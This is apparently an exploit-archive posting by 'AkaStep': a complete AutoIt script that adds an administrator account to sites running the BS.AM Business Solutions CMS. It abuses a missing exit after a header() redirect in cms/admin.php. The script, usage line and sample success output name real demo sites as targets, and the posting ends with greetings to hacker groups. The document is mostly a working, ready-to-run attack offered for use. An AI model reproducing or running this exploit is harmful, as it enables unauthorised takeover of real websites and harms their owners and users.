bs.am Remote Add Admin Exploit

bs_am_remote_add_admin.au3


BS.AM (BUSINESS SOLUTIONS) CMS REMOTE ADD ADMIN EXPLOIT.
THIS IS A EXPLOIT WRITTEN IN AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.
ON SUCCESSFULL REMOTE EXPLOITATION IT WILL NEW ADMIN TO TARGET SITE.

***** THIS IS A WHOLE EXPLOIT! *****
THANK YOU!

FEW DEMOS:

http://asba.am
http://doors.am



DEMO USAGE:

>poc.exe http://asba.am bigbang bigbang


##############################################################
(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: poc.exe http://site.tld  username  password
[*]      DON'T HATE FROM HACKER, HATE YOUR OWN CODE!      [*]
[@@@]           Vuln & Exploit By AkaStep               [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]

##################################################
Trying to add new admin:
To Site:www.asba.am
With Username: bigbang
With Password: bigbang
##################################################

##################################################
Exploit Try Count:1
##################################################
Error Count: 0
##################################################

##################################################
Exploit Try Count:2
##################################################
Error Count: 0
##################################################
Count of errors during exploitation : 0

##################################################
[*] Seems we are going to travel xD.           [*]
Try to login @
Site: asba.am/cms/index.php
With Username: bigbang
With Password: bigbang
##################################################
[*] Exit [*]
##################################################








VULNERABLE CODE:
NOTICE script continues it's execution.Because missing exit; after header();
FUNNY TO SEE HOW MANY PROGRAMMERS FAILS TO UNDERSTAND THIS;)

//cms/admin.php

============SNIP BEGINS============
<?
session_start();
if ($_SESSION['login11_error'] != "no")
header("Location: index.php");
include 'config.php';?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>cms::</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <link rel="stylesheet" type="text/css" href="css/main.css" />
    <script type="text/javascript" src="javascript/jquery-1.4.2.js"></script>

    <script type="text/javascript" src="javascript/admin.js"></script>
    <script type="text/javascript" src="javascript/jquery-ui-1.8.11.custom.min.js"></script>
<script type="text/javascript" src="javascript/jquery.ui.datepicker-hy.js"></script>

<script type="text/javascript" src="javascript/jquery.lightbox-0.5.js"></script>
<link type="text/css" href="css/jquery-ui-1.8.11.custom.css" rel="stylesheet" />
</head>
<body>
<div id="header">

============SNIP ENDS HERE===========



#ce
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>

$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF  & _
'Usage: ' & @ScriptName &  ' http://site.tld ' & ' username  ' & 'password ' & _
@CRLF & "[*]      DON'T HATE FROM HACKER, HATE YOUR OWN CODE!      [*]" & @CRLF & _
'[@@@]           Vuln & Exploit By AkaStep               [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)

$method='POST';
$vulnurl='cms/admin.php?lang=en&page=security';
Global $count=0,$error=0;
$cmsindent='CaptchaSecurityImages.php';
$adminpanel='/cms/index.php';

if  $CmdLine[0] <> 3 Then
MsgBox(64,"","Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName &  ' http://www.site.tld ' & ' username ' & 'password' & @CRLF);
exit;
EndIf


if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$username=$CmdLine[2];
$password=$CmdLine[3];
EndIf



if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
ConsoleWrite('Are you kidding me?');
Exit;
EndIf



$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
Exit;
EndIf


ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));




$sidentify=_INetGetSource($targetsite & $adminpanel,True);




if StringInStr($sidentify,$cmsindent) Then
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
$error+=1;
EndIf




$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')


priv8($targetsite,$username,$password,$count,$error);#~ do magic for me plizzz));~#

Func priv8($targetsite,$username,$password,$count,$error)


$count+=1;


Global $sAddress = $targetsite

$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF &  'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password &  $triptrop;
if $count <=1 then ConsoleWrite($whatcurrentlywedo)

$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count: ' & $error & $triptrop;
ConsoleWrite($doitnicely);
Global $sPostData = "username=" & $username & "&password=" & $password & "&rewrite_password=" & $password & "&ifsubmit=yes";


if $error>=2 OR $count>=2 Then
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)

if int($error)=0 then
ConsoleWrite($triptrop & '[*] Seems we are going to travel xD.           [*]' & _
@CRLF & 'Try to login @ '  & @CRLF  & _
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: '  & _
$username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);
exit;
Else

ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed?   [*]' & @CRLF & _
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
'[*]  May be you are Lucky;)                   [*]' & _
@CRLF & 'Try to login @ '  & @CRLF  & _
'Site: ' & $targetsite & $adminpanel & @CRLF & _
'With Username: '  & $username & @CRLF & 'With Password: ' & $password &  $triptrop & '[*] Exit [*]' & $triptrop);

EndIf
exit;

EndIf



Global $hOpen = _WinHttpOpen("Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325)");


Global $hConnect = _WinHttpConnect($hOpen, $sAddress)


Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');







_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5")
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")
_WinHttpAddRequestHeaders($hRequest, "Keep-Alive: 300")
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));






_WinHttpSendRequest($hRequest, -1, $sPostData)

_WinHttpReceiveResponse($hRequest)

Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
    $sHeader = _WinHttpQueryHeaders($hRequest)
    Do
        $sReturned &= _WinHttpReadData($hRequest)
    Until @error

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(1500);
priv8($targetsite,$username,$password,$count,$error);

Else
$error+=1

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(1500);
priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#

EndIf

EndFunc;=> priv8();


#cs

================================================
           KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep

#ce




//The information contained within this publication is